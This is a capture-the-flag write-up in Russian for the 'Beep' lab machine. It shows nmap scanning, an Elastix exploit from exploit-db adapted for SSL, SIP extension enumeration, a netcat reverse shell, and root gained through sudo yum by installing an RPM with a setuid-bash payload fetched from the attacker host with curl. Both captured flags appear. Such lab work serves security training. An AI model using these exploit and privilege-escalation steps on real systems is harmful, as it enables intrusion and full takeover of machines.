Обзор сервисов

Машина имеет IP-адрес 10.10.10.7. Посмотрим на вывод nmap:

$ nmap -sV -sC -Pn -oN 10.10.10.7 10.10.10.7
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp    open  http       Apache httpd 2.2.3
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: USER IMPLEMENTATION(Cyrus POP3 server v2) TOP EXPIRE(NEVER) LOGIN-DELAY(0) AUTH-RESP-CODE RESP-CODES UIDL APOP PIPELINING STLS
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: UIDPLUS LISTEXT OK URLAUTHA0001 STARTTLS X-NETSCAPE RENAME LIST-SUBSCRIBED ID SORT=MODSEQ CATENATE BINARY SORT ACL Completed NAMESPACE IMAP4rev1 IDLE CONDSTORE THREAD=REFERENCES MULTIAPPEND ANNOTATEMORE QUOTA THREAD=ORDEREDSUBJECT NO MAILBOX-REFERRALS LITERAL+ UNSELECT CHILDREN RIGHTS=kxte IMAP4 ATOMIC
443/tcp   open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2017-04-07T08:22:08
| Not valid after:  2018-04-07T08:22:08
| MD5:   621a 82b6 cf7e 1afa 5284 1c91 60c8 fbc8
|_SHA-1: 800a c6e7 065e 1198 0187 c452 0d9b 18ef e557 a09f
|_ssl-date: 2021-05-22T07:04:45+00:00; +2s from scanner time.
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: 1s

Веб-сервис

На нас встречает Elastix.

Alt text

Попробуем поискать эксплоит. Такой находится на https://www.exploit-db.com/exploits/18650, но для эксплуатации нам нужен существующее имя пользователя, а также выставление в /etc/ssl/openssl.conf параметров minprotocol none, cipherstring default.

Поправим эксплоит:

import ssl
ctxt = ssl.create_default_context()
ctxt.check_hostname = False
ctxt.verify_mode = ssl.CERT_NONE

url = ...

urllib.urlopen(url, context=ctxt)

SIP-сканирование

Проведем сканирование SIP-расширений от 1 до 500.

$ svwar -m INVITE -e1-500 10.10.10.7
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233       | reqauth        |
+-----------+----------------+

Поменяем в эксплоите extension на 233, rhost на 10.10.10.7, lhost на 10.10.16.93.

Alt text

Запустим:

rlwrap nc -lnvp 443
python2 exp.py

Alt text

Пользовательский флаг 

find /home -name *user.txt*
/home/fanis/user.txt
cat /home/fanis/user.txt
d219362ccd047fb37287db33b240ab24

Alt text

Повышение привилегий 

$ sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG
    LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
    LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

Мы можем запускать yum с правами суперпользователя. Воспользуемся гайдом. Полезная нагрузка в файле payload.sh:

#!/bin/bash
chmod u+s /bin/bash

Создадим RPM-пакет:

# на локальной машине
$ sudo gem install fpm
$ fpm -n root -s dir -t rpm -a all --before-install payload.sh .
Created package {:path=>"root-1.0-1.noarch.rpm"}
$ python3 -m http.server 4443
# на удаленной машине
$ curl http://10.10.16.93:4443/test/root-1.0-1.noarch.rpm -o root-1.0-1.noarch.rpm
$ sudo yum localinstall --disablerepo=* --nogpgcheck root-1.0-1.noarch.rpm
> yes
$ ls -la /bin/bash
-rwsr-xr-x 1 root root 729292 Jan 22  2009 /bin/bash
$ /bin/bash -p
$ id
uid=100(asterisk) gid=101(asterisk) euid=0(root)

Alt text

Флаг суперпользователя 

cd /root
ls -la
total 16308
drwxr-x---  2 root root     4096 Jul 16  2019 .
drwxr-xr-x 22 root root     4096 Jul 29 22:51 ..
-rw-------  1 root root     6025 Apr  7  2017 anaconda-ks.cfg
-rw-------  1 root root     1186 Jul 29 21:52 .bash_history
-rw-r--r--  1 root root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root      191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root root      176 Jan  6  2007 .bashrc
-rw-r--r--  1 root root      100 Jan  6  2007 .cshrc
-r-xr-xr-x  1 root root   190461 Aug 10  2011 elastix-pr-2.2-1.i386.rpm
-rw-r--r--  1 root root    18433 Apr  7  2017 install.log
-rw-r--r--  1 root root        0 Apr  7  2017 install.log.syslog
-rw-r--r--  1 root root        1 Apr  7  2017 postnochroot
-rw-------  1 root root       33 Jul 29 18:16 root.txt
-rw-r--r--  1 root root      129 Jan  6  2007 .tcshrc
-r-xr-xr-x  1 root root 16358730 Oct 31  2011 webmin-1.570-1.noarch.rpm
cat root.txt
47977ff7e1438d8ceeffb77ccf002bf2

Alt text